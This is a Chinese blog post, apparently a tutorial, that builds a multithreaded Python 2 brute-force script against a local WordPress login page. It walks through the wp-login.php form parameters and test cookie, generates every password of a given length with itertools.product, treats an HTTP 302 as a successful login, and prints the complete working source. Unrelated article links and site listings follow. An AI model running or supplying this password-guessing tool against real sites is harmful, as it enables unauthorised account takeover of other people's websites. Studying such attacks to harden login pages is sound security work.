搭建了一个本地wordpress,写一个基于多线程异步I/O的暴力破解

1 测试

提交错误的表单数据时,查看请求参数

登录时发送的cookie

2 登录分析

经过多次测试,发现无论是输入正确的密码还是错误的密码,这些登录需要提交的参数是不会改变的。并且只要登录成功,服务器一定会返回包含sessionid的cookie。整理后的发送参数如下:

参数

log:用户名

pwd:密码

wp-submit:Log In(定值)

redirect_to:http://localhost/wordpress/wp-admin

test_cookie:1(定值)

Cookie

wordpress_test_cookie:WP Cookie check(定值)

3 思路分析

口令集:

暴力破解一般是使用口令字符的全部排列组合,所使用的口令集可使用itertool模块的笛卡尔积生成方法(product)来生成。当然这样计算开销比较大,适合口令长度比较小的情况。当然也可以使用字典,那么就可能需要结合用户信息定制字典。

数据结构:

使用队列来存储口令集是个很不错的选择,能够极大得降低数据读取的复杂性。

模拟登陆:

通过requests模块发送post请求,来模拟登陆,发送的参数与cookie依照上面的分析来发送即可。

登陆:

登陆失败,只是本地刷新,所以响应码200。登陆成功后,跳转到管理员后台,返回响应码302。

优化破解性能:

可使用异步I/O来进行破解过程的优化,待实现。

4 源码

# !/usr/bin/env python

# -*- coding:utf-8 -*-

import requests

import sys

import itertools

import Queue

import threading

import time

class Bruter(object):

    def __init__(self, user, characters, pwd_len, threads):

        self.user = user

        self.found = False # 存放破解结果,破解成功为True,失败为False

        self.threads = threads

        print '构建待测试口令队列中...'

        self.pwd_queue = Queue.Queue()

        for pwd in list(itertools.product(characters, repeat=pwd_len)):

            self.pwd_queue.put(''.join(pwd))

        self.result = None

        print '构建成功!'

    def brute(self):

        for i in range(self.threads):

            t = threading.Thread(target=self.__web_bruter)

            t.start()

            print '破解线程-->%s 启动' % t.ident

        while (not self.pwd_queue.empty()): # 剩余口令集判断

            sys.stdout.write('\r 进度: 还剩余%s个口令 (每1s刷新)' % self.pwd_queue.qsize())

            sys.stdout.flush()

            time.sleep(1)

            print '\n破解完毕'

    def __login(self, pwd):

        url = 'http://localhost/wordpress/wp-login.php'

        values = {'log': self.user, 'pwd': pwd, 'wp-submit': 'Log In',

                  'redirect_to': 'http://localhost/wordpress/wp-admin', 'test_cookie': '1'}

        my_cookie = {'wordpress_test_cookie': 'WP Cookie check'}

        r = requests.post(url, data=values, cookies=my_cookie, allow_redirects=False) # 禁用重定向,以便后边判断登陆状态

        if r.status_code == 302: # 登陆状态判断

            return True

        return False

    def __web_bruter(self): # 破解子线程函数

        while not self.pwd_queue.empty() and not self.found:

            pwd_test = self.pwd_queue.get()

            if self.__login(pwd_test):

                self.found = True

                self.result = pwd_test

                print '破解 %s 成功,密码为: %s' % (self.user, pwd_test)

            else:

                self.found = False

if __name__ == '__main__':

    if len(sys.argv) != 5:

        print '用法 : cmd [用户名] [密码字符] [密码长度] [线程数]'

        exit(0)

    b = Bruter(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]))

    b.brute()

    print b.result

基于python的多线程暴破脚本的更多相关文章

  1. 基于Python的AT命令测试脚本

    对于各种有线&无线调制解调器(modem)产品来说,AT命令是事实上的标准接口之一,在工业界被广泛使用. 我开发了一套基于Python的AT命令测试脚本,源代码可在github上获取: htt ...

  2. 基于Python的多线程模块Threading小结

    步入正题前,先准备下基本知识,线程与进程的概念. 相信作为一个测试人员,如果从理论概念上来说其两者的概念或者区别,估计只会一脸蒙蔽,这里就举个例子来说明下其中的相关概念. 平安夜刚过,你是吃到了苹果还 ...

  3. 自制基于python的DoU log分析脚本

    工作中测试DoU的log需要分析,原先是使用excel,去ctrl c,ctrl v截取数据,整理格式等等.一来,这工作虽然很简单,但是非常耗时,不熟练的人(比如我)一搞搞个半天:二来,不小心还会出现 ...

  4. 基于Python的多线程与多进程

    1.I/O密集型与计算密集型 多进程适用于I/O密集型 多进程适用于计算密集型 2.没有sleep(T)的多个死循环只能用多进程 3.模块介绍: 1)threading模块(_thread模块已淘汰) ...

  5. 基于python的MD5脚本

    摘要 鉴于网上的各大MD5爆破网站,当网络差时访问速度慢,至此小弟写了个基于python的MD5爆破脚本,欢迎各位师傅在评论区留下您们宝贵的意见. 开发思路 1.通过 string模块 自动生成字典: ...

  6. 基于python深度学习的apk风险预测脚本

    基于python深度学习的apk风险预测脚本 为了有效判断安卓apk有无恶意操作,利用python脚本,通过解包apk文件,对其中xml文件进行特征提取,通过机器学习构建模型,预测位置的apk包是否有 ...

  7. 一行导出所有任意微软SQL server数据脚本-基于Python的微软官方mssql-scripter工具使用全讲解

    文章标题: 一行导出所有任意微软SQL serer数据脚本-基于Python的微软官方mssql-scripter工具使用全讲解 关键字 : mssql-scripter,SQL Server 文章分 ...

  8. 基于Python的Web应用开发实践总结

    基于Python的Web应用开发学习总结 项目地址   本次学习采用的是Flask框架.根据教程开发个人博客系统.博客界面如图所示. 整个学习过程收获很多,以下是学习总结. 1.virtualenv ...

  9. 基于python的opcode优化和模块按需加载机制研究(学习与个人思路)(原创)

    基于python的opcode优化和模块按需加载机制研究(学习与思考) 姓名:XXX 学校信息:XXX 主用编程语言:python3.5 个人技术博客:http://www.cnblogs.com/M ...

随机推荐

  1. element ui aside — 侧栏导航菜单移入移出折叠效果

    效果如图,移入移出控制折叠,点击按钮后移入移出不可控制折叠. 功能是很简单的功能,不过昨天这块还是弄了小一个小时,所以记录下来. 发现的问题: 模版上el-aside写上@mouseenter无效 解 ...

  2. celery_消息队列

    http://www.cnblogs.com/wupeiqi/articles/8796552.html 一. celery 简介 Celery 是一个专注于实时处理和任务调度的分布式任务队列, 同时 ...

  3. Day 49 CSS样式.

    外部样式 1.元素选择器 /*1. 元素选择器*/p{ color :red} <p>1.我是一个p标签</p> 2.ID选择器 /*2 ID 选择器*/#p{ color : ...

  4. SpringMVC 上传文件and过滤器

    SpringMVC提供了一个MultipartResolver接口用来实现文件上传,并使用Commons FileUpload技术实现了一个该接口的实现类CommonsMultipartResolve ...

  5. flask源码解析之上下文为什么用栈

    楔子 我在之前的文章<flask源码解析之上下文>中对flask上下文流程进行了详细的说明,但是在学习的过程中我一直在思考flask上下文中为什么要使用栈完成对请求上下文和应用上下文的入栈 ...

  6. win7下oracle的安装

    1.参考地址1:http://www.cnblogs.com/libiao/archive/2008/08/24/1275000.html 2.参考地址2:http://www.server110.c ...

  7. Zookeeper原理分析之存储结构TxnLog

    Zookeeper事物日志文件用于记录事物操作,如添加,删除节点等等,都会在事务日志中记录一条记录.下面我们就详细分析一下txnLog事务日志文件. txnLog事务日志文件文件由三部分组成: 日志文 ...

  8. python实战——网络爬虫之request

    Urllib库是python中的一个功能强大的,用于操做URL,并在做爬虫的时候经常要用到的库,在python2中,分为Urllib和Urllib2两个库,在python3之后就将两个库合并到Urll ...

  9. linux系统上内网ip和和外网ip的关系

    1.不同服务之间的访问需要使用公网IP+端口才能访问 2.服务器上一般都是域名访问,服务器会把ip+端口映射成固定的域名,所以如果想访问服务器上其他应用,就必须的放开应用限制 问题,在服务器上放开对某 ...

  10. cmd下查看应用端口情况

    在win10开始窗口右侧的空白处点击CMD,在上方弹出窗口中选择命令提示符,双击进入 在弹出命令界面中,输入netstat -na命令后回车,如下图所示,可以看到所有目前打开的端口 如果要查看打开端口 ...